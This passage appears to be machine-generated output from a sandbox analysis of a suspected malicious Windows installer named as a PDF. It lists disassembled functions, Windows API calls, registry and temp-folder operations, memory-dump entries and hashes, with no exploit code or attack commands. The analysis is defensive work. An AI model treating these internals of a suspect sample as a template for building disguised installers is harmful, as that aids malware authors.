                                                                                                                                                control_flow_graph 837 40225d-402268 838 40233e-402343 837->838 839 40226e-402289 call 40303e * 2 837->839 840 402345-40234a call 405e3d 838->840 849 40228b-402296 GetModuleHandleW 839->849 850 40229c-4022aa LoadLibraryExW 839->850 846 402ea5-402eb7 840->846 851 4022b0-4022c2 call 40637e 849->851 854 402298 849->854 850->851 852 402335-40233c 850->852 857 4022c4-4022ca 851->857 858 402306-40230c call 405e3d 851->858 852->840 854->850 859 4022e6-402304 857->859 860 4022cc-4022e0 call 405e3d 857->860 863 402311-402315 858->863 859->863 860->863 871 4022e2-4022e4 860->871 863->846 864 40231b-402323 call 403dd9 863->864 864->846 870 402329-402330 FreeLibrary 864->870 870->846 871->863
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 0040228C
                                                                                                                                                  • Part of subcall function 00405E3D: lstrlenW.KERNEL32(00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E6F
                                                                                                                                                  • Part of subcall function 00405E3D: lstrlenW.KERNEL32(?,00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E81
                                                                                                                                                  • Part of subcall function 00405E3D: lstrcatW.KERNEL32(00424230,?,?,00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E9C
                                                                                                                                                  • Part of subcall function 00405E3D: SetWindowTextW.USER32(00424230,00424230), ref: 00405EB4
                                                                                                                                                  • Part of subcall function 00405E3D: SendMessageW.USER32(?), ref: 00405EDB
                                                                                                                                                  • Part of subcall function 00405E3D: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405EF6
                                                                                                                                                  • Part of subcall function 00405E3D: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405F03
                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 004022A0
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,?,00000001,?), ref: 0040232A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll
                                                                                                                                                • API String ID: 334405425-3263071273
                                                                                                                                                • Opcode ID: 47bf99d45f064d7ea273baa28ef99b1fd27508b9c52d70213c0230c50d8e9019
                                                                                                                                                • Instruction ID: 5ab2f9945def4c914915ed97a450473ade9320cc6c17bc2c10081fcd0c3c0cb4
                                                                                                                                                • Opcode Fuzzy Hash: 47bf99d45f064d7ea273baa28ef99b1fd27508b9c52d70213c0230c50d8e9019
                                                                                                                                                • Instruction Fuzzy Hash: F121FB32644301A7C7119F61CE49A3F7694AF94751F60053FF951712D0DBBC98129A9F
                                                                                                                                                Function 00402656 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registrystringCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 872 402656-4026a8 call 40303e * 2 call 403023 call 4063ba 881 402ea5-402eb7 872->881 882 4026ae-4026b9 872->882 884 4026d1-4026d6 882->884 885 4026bb-4026cf call 40303e lstrlenW 882->885 888 4026e7-4026ec 884->888 889 4026d8-4026e5 call 403002 884->889 892 402700-40271a RegSetValueExW 885->892 888->892 893 4026ee-4026fe call 4032c7 888->893 889->892 895 40271c-402723 RegCloseKey 892->895 893->892 895->881
                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq66FB.tmp,00000023,?,00000011,00000002), ref: 004026C3
                                                                                                                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsq66FB.tmp,?,?,00000011,00000002), ref: 00402710
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsq66FB.tmp,?,?,00000011,00000002), ref: 0040271D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseValuelstrlen
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsq66FB.tmp
                                                                                                                                                • API String ID: 2655323295-3996896131
                                                                                                                                                • Opcode ID: ade492d5df03a8d2c7ae578a81cf4fc1b43c494d79c722f1f7b613b4c58fbaf7
                                                                                                                                                • Instruction ID: af464e8318e7c5fbf483fadd1347ea1ff69f410dc300b2d4ce688db9f9141b9d
                                                                                                                                                • Opcode Fuzzy Hash: ade492d5df03a8d2c7ae578a81cf4fc1b43c494d79c722f1f7b613b4c58fbaf7
                                                                                                                                                • Instruction Fuzzy Hash: 0821F232604300ABD7119FA5CD45B2FBBE8EB98764F11483EF581F31C0C7B99905879A
                                                                                                                                                Function 004069FB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 898 4069fb-406a11 GetModuleHandleA 899 406a13-406a14 call 4062b3 898->899 900 406a1d-406a25 GetProcAddress 898->900 903 406a19-406a1b 899->903 901 406a2b-406a2d 900->901 903->900 903->901
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403918,?), ref: 00406A09
                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406A25
                                                                                                                                                  • Part of subcall function 004062B3: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004062CA
                                                                                                                                                  • Part of subcall function 004062B3: wsprintfW.USER32 ref: 00406306
                                                                                                                                                  • Part of subcall function 004062B3: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040631A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                                                                                                                                • API String ID: 2547128583-890815371
                                                                                                                                                • Opcode ID: 5444f8ec23be2c6a9b0b43c4d015ad41947603a44c70bf61a8aaf5f9aaa848d0
                                                                                                                                                • Instruction ID: fde045b120d4e9fbedc4602cc912674c940b6414d211d64326a364595d17484f
                                                                                                                                                • Opcode Fuzzy Hash: 5444f8ec23be2c6a9b0b43c4d015ad41947603a44c70bf61a8aaf5f9aaa848d0
                                                                                                                                                • Instruction Fuzzy Hash: 18D0C2322012159BC7007F22AE0888B771DEF96350705843AF541B2230D738C82289BD
                                                                                                                                                Function 00405F41 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateDirectoryW.KERNELBASE(00000000,?), ref: 00405F82
                                                                                                                                                • GetLastError.KERNEL32 ref: 00405F8C
                                                                                                                                                • SetFileSecurityW.ADVAPI32(00000000,80000007,00000001), ref: 00405FA5
                                                                                                                                                • GetLastError.KERNEL32 ref: 00405FB3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3449924974-0
                                                                                                                                                • Opcode ID: 26aef2f2a74a45cd408aa394e611098260eee0f39c193ac8fe47435c93f2fc62
                                                                                                                                                • Instruction ID: 042ea5188ab4a242f45dae448e3eca013d4ac0ceece2a382c006faaf9ef1663f
                                                                                                                                                • Opcode Fuzzy Hash: 26aef2f2a74a45cd408aa394e611098260eee0f39c193ac8fe47435c93f2fc62
                                                                                                                                                • Instruction Fuzzy Hash: F1012C74D0060ADFEB008FA0DA04BAEBBB4FF04355F10443AE545F2290D77886488F99
                                                                                                                                                Function 004032C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,C:\Users\user\Desktop,?,00000000,004036F8,000000FF,00000000,00000000,?,?), ref: 004032EA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FilePointer
                                                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                                                • API String ID: 973152223-3370423016
                                                                                                                                                • Opcode ID: e848af23392ef9212b537c313fa36c8933c56bd9746aa11a2b1857199a9f20aa
                                                                                                                                                • Instruction ID: 03ccdd90c03623ddb9a7e60c54f99ad42dbd580121bb72f8b918a97a4a7c42e8
                                                                                                                                                • Opcode Fuzzy Hash: e848af23392ef9212b537c313fa36c8933c56bd9746aa11a2b1857199a9f20aa
                                                                                                                                                • Instruction Fuzzy Hash: A631BF71600205AFDF109F5ADE80E9E3EACAB44755B00413EFE05F62A1DB38DE20DB69
                                                                                                                                                Function 00405F21 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403DCC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00405F29
                                                                                                                                                • GetLastError.KERNEL32 ref: 00405F33
                                                                                                                                                Strings
                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F21
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                • API String ID: 1375471231-3355392842
                                                                                                                                                • Opcode ID: ffc7d6197e1beb19ef1624df4ffa93a3437123ffd0222c56b7c883f1d5fa86bc
                                                                                                                                                • Instruction ID: 7225596eb2c355decc995a26192eac208658e83bd5f5fd8e1e75763a45e760bc
                                                                                                                                                • Opcode Fuzzy Hash: ffc7d6197e1beb19ef1624df4ffa93a3437123ffd0222c56b7c883f1d5fa86bc
                                                                                                                                                • Instruction Fuzzy Hash: E1C08C327005319BC3701B75BE0CA87BE98EF107A1303423AF988E2220DA308C00CBE8
                                                                                                                                                Function 00406FBD Relevance: 5.2, APIs: 4, Instructions: 241COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 57e40a78f00abd15777e94ecd5bdab5ad8d33f2a4d0ed0717479564f524859e3
                                                                                                                                                • Instruction ID: a17ac8480bdadea9300d7b84b1a57ef3aebf7c5664a30c8e763fb849d5045f8c
                                                                                                                                                • Opcode Fuzzy Hash: 57e40a78f00abd15777e94ecd5bdab5ad8d33f2a4d0ed0717479564f524859e3
                                                                                                                                                • Instruction Fuzzy Hash: D4913571A0C3908FD364CF29C480B6ABBE1AFC9344F10892EE59AD7390D774A905CB57
                                                                                                                                                Function 7031167A Relevance: 4.6, APIs: 3, Instructions: 123COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 70312351: GlobalFree.KERNEL32(?), ref: 70312A44
                                                                                                                                                  • Part of subcall function 70312351: GlobalFree.KERNEL32(?), ref: 70312A4A
                                                                                                                                                  • Part of subcall function 70312351: GlobalFree.KERNEL32(?), ref: 70312A50
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 70311738
                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 703117C3
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 703117E9
                                                                                                                                                  • Part of subcall function 70311FCB: GlobalAlloc.KERNEL32(?,?), ref: 70311FFA
                                                                                                                                                  • Part of subcall function 703117F7: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,70311708,00000000), ref: 7031189A
                                                                                                                                                  • Part of subcall function 70311F1E: wsprintfW.USER32 ref: 70311F51
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37968691201.0000000070311000.00000020.00000001.01000000.00000005.sdmp, Offset: 70310000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37968666099.0000000070310000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37968717841.0000000070314000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37968741619.0000000070316000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_70310000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3962662361-0
                                                                                                                                                • Opcode ID: 594075d7dd791b6feee31cf85ed0faefd90caf3d38a2c4bb642dfe5942dd3d0d
                                                                                                                                                • Instruction ID: 294d488696438f86535ef6404ca974ef9e4f8f93ee3839f32aceccbc90e1acb5
                                                                                                                                                • Opcode Fuzzy Hash: 594075d7dd791b6feee31cf85ed0faefd90caf3d38a2c4bb642dfe5942dd3d0d
                                                                                                                                                • Instruction Fuzzy Hash: 4741DD32400A4BEFCB699F68C844BCE33BCBB0C311F118019F94A8A381DB74A9C6C651
                                                                                                                                                Function 00403148 Relevance: 4.6, APIs: 3, Instructions: 102COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040315B
                                                                                                                                                  • Part of subcall function 00403131: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004036CC,?), ref: 0040313F
                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,?,004032F7,00000004,C:\Users\user\Desktop,?,00000000,004036F8,000000FF,00000000,00000000,?,?), ref: 0040318E
                                                                                                                                                • SetFilePointer.KERNELBASE(00005080,00000000,00000000,004149F0,-0032BFAE,?,004032F7,00000004,C:\Users\user\Desktop,?,00000000,004036F8,000000FF,00000000,00000000,?), ref: 004032AD
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FilePointer$CountTick
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1092082344-0
                                                                                                                                                • Opcode ID: 5996c985795e8b5707d76d0be3e92778556d34cb048b6a269bacef030baef48e
                                                                                                                                                • Instruction ID: d2eefc4df71019c2b16fa905559572dc2303f56b63bf2239b88d083b882742d4
                                                                                                                                                • Opcode Fuzzy Hash: 5996c985795e8b5707d76d0be3e92778556d34cb048b6a269bacef030baef48e
                                                                                                                                                • Instruction Fuzzy Hash: F8315CF1912211DBC710AF29EE849667F68EB84326711433FE901B72E0CB399944DB9D
                                                                                                                                                Function 004027B0 Relevance: 4.6, APIs: 3, Instructions: 53registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004027E8
                                                                                                                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004027FC
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00402818
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
